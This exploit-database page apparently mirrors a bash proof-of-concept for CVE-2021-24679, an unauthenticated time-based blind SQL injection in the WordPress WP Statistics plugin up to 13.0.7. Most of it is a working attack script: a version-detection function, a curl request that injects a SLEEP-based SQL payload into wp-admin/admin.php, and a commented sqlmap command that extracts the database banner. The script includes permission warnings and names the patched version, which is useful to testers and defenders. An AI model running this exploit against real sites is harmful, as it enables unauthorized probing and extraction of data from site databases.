WordPress WP Statistics 13.0.7 SQL Injection
CVE
Category
Price
Severity
CVE-2021-24679
CWE-89
Unknown
High
Author
Risk
Exploitation Type
Date
Sameer Khera
High
Remote
2021-05-25
CPE
cpe:cpe:/a:wordpress:wp_statistics:13.0.7
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050143 Below is a copy:
WordPress WP Statistics 13.0.7 SQL Injection # Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
# Date: 20/05/2021
# Exploit Author: Mansoor R (@time4ster)
# CVSS Score: 7.5 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
# Version Affected: 13.0 to 13.0.7
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# Patch: Upgrade to wp-statistics 13.0.8 (or above)
# Tested On: wp-statistics 13.0.6,13.0.7
#!/bin/bash
# Credits:
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
# SQLmap Exploit for grepping database banner (automated):
# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
# WARNINGS:
# Only test the exploit on websites you are authorized to.
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
# Exploit
# ==============
echo
echo "============================================================================================"
echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp-url <string>Wordpress target url
-k|--checkOnly checks whether vulnerable version of plugin is running or not.
-h|--helpPrint Help menu
Example:
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
"
}
#Processing arguments
check="false"
exploit="true"
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp-url)
wp_url="$2"
shift
shift # past argument
;;
-k|--check)
check="true"
exploit="false"
shift
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
function checkVersion()
{
url="$1"
[[ -z "$url" ]] && return
target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
is_vulnerable="false"
for v in "${vuln_version[@]}";do
[[ "$version" == "$v" ]] && is_vulnerable="true" && break
done
[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
}
function exploitPlugin()
{
url="$1"
target_endpoint="$url/wp-admin/admin.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
sleep=3
payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
read choice
[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
echo
echo "[+] Trying Payload:"
set -x
curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
--data-urlencode "page=wps_pages_page" \
--data-urlencode "type=1" \
--data-urlencode "$payload"
}
[[ "$check" == "true" ]] && checkVersion "$wp_url"
[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum